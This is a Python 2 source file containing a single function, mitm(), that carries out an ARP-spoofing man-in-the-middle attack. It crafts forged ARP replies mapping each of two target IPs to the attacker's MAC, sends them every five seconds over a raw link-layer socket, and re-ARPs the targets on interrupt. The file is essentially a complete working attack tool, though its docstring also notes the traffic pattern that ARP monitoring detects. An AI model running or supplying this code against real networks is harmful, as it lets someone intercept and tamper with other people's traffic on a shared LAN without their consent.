##########################################################################
# Copyright (C) Chatzopoulos Dimos 2010 <[email protected]> #
# #
# This program is free software: you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation, either version 3 of the License, or #
# (at your option) any later version. #
# #
# This program is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU General Public License for more details. #
# #
# You should have received a copy of the GNU General Public License #
# along with this program. If not, see <http://www.gnu.org/licenses/>. #
##########################################################################
import dpkt
import socket
import time
import functs
def mitm(target1, target2, device):
    """
    Poison the ARP caches of two hosts so that each one maps the other's IP
    address to this machine's MAC address.

    Two Ethernet frames carrying ARP replies are built, one per target, and
    both are re-sent every 5 seconds on a raw PF_PACKET socket bound to
    `device` until KeyboardInterrupt. The handler then sends each target one
    reply carrying the peer's real MAC address, closes the socket and returns.

    target1, target2 -- IPv4 address strings (passed to socket.inet_aton)
    device           -- name of the network interface to bind and send on

    On the wire this is a steady stream of unsolicited ARP replies in which a
    single hardware address answers for both IPs; that pattern is what ARP
    monitoring and switch-side dynamic ARP inspection key on.
    """
    reply_for_t1 = dpkt.arp.ARP()
    reply_for_t2 = dpkt.arp.ARP()

    # Both replies advertise the local interface's MAC as sender hardware address.
    own_mac = functs.eth_aton(functs.get_device_mac(device))
    for reply in (reply_for_t1, reply_for_t2):
        reply.op = dpkt.arp.ARP_OP_REPLY
        reply.sha = own_mac

    # Hardware addresses of the two targets, as returned by functs.get_mac.
    t1_mac = functs.eth_aton(functs.get_mac(target1, device))
    t2_mac = functs.eth_aton(functs.get_mac(target2, device))
    reply_for_t1.tha = t1_mac
    reply_for_t2.tha = t2_mac

    # Each reply carries the *other* target's IP as its sender protocol address.
    t2_ip = socket.inet_aton(target2)
    t1_ip = socket.inet_aton(target1)
    reply_for_t1.spa, reply_for_t1.tpa = t2_ip, t1_ip
    reply_for_t2.spa, reply_for_t2.tpa = t1_ip, t2_ip

    frame_for_t1 = dpkt.ethernet.Ethernet()
    frame_for_t2 = dpkt.ethernet.Ethernet()
    # The interface MAC is looked up a second time for the Ethernet source field.
    frame_src = functs.eth_aton(functs.get_device_mac(device))
    for frame, reply in ((frame_for_t1, reply_for_t1),
                         (frame_for_t2, reply_for_t2)):
        frame.src = frame_src
        frame.dst = reply.tha
        frame.data = reply
        frame.type = dpkt.ethernet.ETH_TYPE_ARP

    # Link-layer raw socket (Linux PF_PACKET, needs raw-socket privileges),
    # bound to the interface with the ARP ethertype.
    sock = socket.socket(socket.PF_PACKET, socket.SOCK_RAW)
    sock.bind((device, dpkt.ethernet.ETH_TYPE_ARP))
    print 'Poisoning',target1,'and', target2,'...\n\n'

    while True:
        try:
            sock.send(frame_for_t1.pack())
            sock.send(frame_for_t2.pack())
            time.sleep(5)  # interval between rounds
        except KeyboardInterrupt:
            print "\n\n MITM attack stopped. \n"
            # Put the peer's real MAC in as ARP sender so each target's cache
            # entry is corrected. The Ethernet source field is left as the
            # local MAC, so in these two frames it differs from the ARP
            # sender address.
            reply_for_t1.sha = t2_mac
            reply_for_t2.sha = t1_mac
            frame_for_t1.data = reply_for_t1
            frame_for_t2.data = reply_for_t2
            for host, frame in ((target1, frame_for_t1),
                                (target2, frame_for_t2)):
                print 're-ARPing',host,'...',
                sock.send(frame.pack())
                print 'Done!\n'
            sock.close()
            break